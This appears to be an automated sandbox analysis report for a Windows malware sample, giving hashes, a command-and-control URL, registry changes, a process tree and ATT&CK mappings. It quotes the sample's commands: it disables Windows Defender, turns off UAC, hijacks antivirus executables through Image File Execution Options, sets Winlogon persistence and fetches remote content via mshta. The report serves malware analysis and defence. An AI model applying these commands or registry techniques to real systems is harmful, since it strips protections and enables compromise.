Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
08/07/2024, 20:15
Static task
static1
Behavioral task
behavioral1
Sample
2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe
Resource
win10v2004-20240704-en
General
-
Target
2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe
-
Size
2.2MB
-
MD5
2dab1dbc69f84a8582d118aeb9605c52
-
SHA1
6ebebcfc0f3d01c11afe21fe95a67af0b5578ba1
-
SHA256
13bea9694a6b9ca62d29c5fb3337231b406615f10e103889b337251f97814775
-
SHA512
c0adc6b26e986098677f8b5b1bd34c9bfe13025b00f4efafd4656c3beb7115269dd971e373606c3211aba3388e53080a7ba79280325736c513b46d8f2bbae8d4
-
SSDEEP
49152:dRRIZ2dUIPYiiqowvq00p7PiKXTqp/nYi:Lw/IrwzXOp/Yi
Malware Config
Extracted
http://softscoreinc.com/soft-usage/favicon.ico?0=1200&1=MPPNGHQZ&2=i-s&3=104&4=9200&5=6&6=2&7=919041&8=1033
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-587429654-1855694383-2268796072-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\nrrlgu.exe" nrrlgu.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" nrrlgu.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" nrrlgu.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" nrrlgu.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 16 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe nrrlgu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" nrrlgu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe\Debugger = "svchost.exe" nrrlgu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe nrrlgu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe\Debugger = "svchost.exe" nrrlgu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe nrrlgu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe\Debugger = "svchost.exe" nrrlgu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" nrrlgu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe nrrlgu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe" nrrlgu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe\Debugger = "svchost.exe" nrrlgu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe nrrlgu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe nrrlgu.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe" nrrlgu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe nrrlgu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe nrrlgu.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-587429654-1855694383-2268796072-1000\Control Panel\International\Geo\Nation 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe -
Executes dropped EXE 1 IoCs
pid Process 3280 nrrlgu.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" nrrlgu.exe -
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4620 sc.exe 4260 sc.exe 2692 sc.exe 2832 sc.exe 3852 sc.exe 1916 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3280 nrrlgu.exe Token: SeShutdownPrivilege 3280 nrrlgu.exe Token: SeDebugPrivilege 3280 nrrlgu.exe Token: SeShutdownPrivilege 3280 nrrlgu.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe 3280 nrrlgu.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 4952 wrote to memory of 3852 4952 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 84 PID 4952 wrote to memory of 3852 4952 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 84 PID 4952 wrote to memory of 3852 4952 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 84 PID 4952 wrote to memory of 1916 4952 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 85 PID 4952 wrote to memory of 1916 4952 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 85 PID 4952 wrote to memory of 1916 4952 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 85 PID 4952 wrote to memory of 3160 4952 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 86 PID 4952 wrote to memory of 3160 4952 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 86 PID 4952 wrote to memory of 3160 4952 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 86 PID 4952 wrote to memory of 4620 4952 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 87 PID 4952 wrote to memory of 4620 4952 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 87 PID 4952 wrote to memory of 4620 4952 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 87 PID 4952 wrote to memory of 3280 4952 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 92 PID 4952 wrote to memory of 3280 4952 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 92 PID 4952 wrote to memory of 3280 4952 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 92 PID 3160 wrote to memory of 244 3160 net.exe 93 PID 3160 wrote to memory of 244 3160 net.exe 93 PID 3160 wrote to memory of 244 3160 net.exe 93 PID 4952 wrote to memory of 4084 4952 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 94 PID 4952 wrote to memory of 4084 4952 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 94 PID 4952 wrote to memory of 4084 4952 2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe 94 PID 3280 wrote to memory of 2832 3280 nrrlgu.exe 97 PID 3280 wrote to memory of 2832 3280 nrrlgu.exe 97 PID 3280 wrote to memory of 2832 3280 nrrlgu.exe 97 PID 3280 wrote to memory of 2692 3280 nrrlgu.exe 98 PID 3280 wrote to memory of 2692 3280 nrrlgu.exe 98 PID 3280 wrote to memory of 2692 3280 nrrlgu.exe 98 PID 3280 wrote to memory of 2964 3280 nrrlgu.exe 99 PID 3280 wrote to memory of 2964 3280 nrrlgu.exe 99 PID 3280 wrote to memory of 2964 3280 nrrlgu.exe 99 PID 3280 wrote to memory of 4260 3280 nrrlgu.exe 100 PID 3280 wrote to memory of 4260 3280 nrrlgu.exe 100 PID 3280 wrote to memory of 4260 3280 nrrlgu.exe 100 PID 3280 wrote to memory of 4192 3280 nrrlgu.exe 105 PID 3280 wrote to memory of 4192 3280 nrrlgu.exe 105 PID 3280 wrote to memory of 4192 3280 nrrlgu.exe 105 PID 2964 wrote to memory of 1704 2964 net.exe 106 PID 2964 wrote to memory of 1704 2964 net.exe 106 PID 2964 wrote to memory of 1704 2964 net.exe 106 -
System policy modification 1 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System nrrlgu.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" nrrlgu.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" nrrlgu.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" nrrlgu.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\2dab1dbc69f84a8582d118aeb9605c52_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4952 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend2⤵
- Launches sc.exe
PID:3852
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled2⤵
- Launches sc.exe
PID:1916
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc2⤵
- Suspicious use of WriteProcessMemory
PID:3160 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc3⤵PID:244
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled2⤵
- Launches sc.exe
PID:4620
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\nrrlgu.exeC:\Users\Admin\AppData\Roaming\Microsoft\nrrlgu.exe2⤵
- Modifies WinLogon for persistence
- UAC bypass
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3280 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend3⤵
- Launches sc.exe
PID:2832
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:2692
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc3⤵
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc4⤵PID:1704
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled3⤵
- Launches sc.exe
PID:4260
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe "http://softscoreinc.com/soft-usage/favicon.ico?0=1200&1=MPPNGHQZ&2=i-s&3=104&4=9200&5=6&6=2&7=919041&8=1033"3⤵PID:4192
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\2DAB1D~1.EXE" >> NUL2⤵PID:4084
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.2MB
MD52dab1dbc69f84a8582d118aeb9605c52
SHA16ebebcfc0f3d01c11afe21fe95a67af0b5578ba1
SHA25613bea9694a6b9ca62d29c5fb3337231b406615f10e103889b337251f97814775
SHA512c0adc6b26e986098677f8b5b1bd34c9bfe13025b00f4efafd4656c3beb7115269dd971e373606c3211aba3388e53080a7ba79280325736c513b46d8f2bbae8d4